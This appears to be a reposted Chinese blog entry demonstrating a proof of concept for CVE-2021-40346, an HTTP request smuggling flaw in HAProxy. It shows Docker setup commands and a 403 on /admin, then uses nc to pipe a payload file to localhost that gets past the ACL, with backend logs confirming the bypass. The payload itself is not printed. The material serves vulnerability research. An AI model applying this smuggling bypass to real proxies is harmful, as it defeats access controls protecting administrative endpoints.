CVE-2021-40346(HAProxy HTTP 走私)屁噢C

2021-09-18 11:48:44 浏览数 (2)

docker启动

代码语言:javascript复制
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4

测试:

确认/admin被拒绝。

代码语言:javascript复制
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

你不会/admin在日志中看到。这意味着请求没有到达后端服务器,因为 HAProxy 拒绝了它。

代码语言:javascript复制
$ docker logs poc
server start at port 8000
/

然后,您可以确保它可以被 payload.txt 绕过。

代码语言:javascript复制
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked

6
hello

0

你会/admin在日志中找到。

代码语言:javascript复制
$ docker logs poc
server start at port 8000
/
/
/admin

项目地址:

aHR0cHM6Ly9naXRodWIuY29tL2tucXlmMjYzL0NWRS0yMDIxLTQwMzQ2

0 人点赞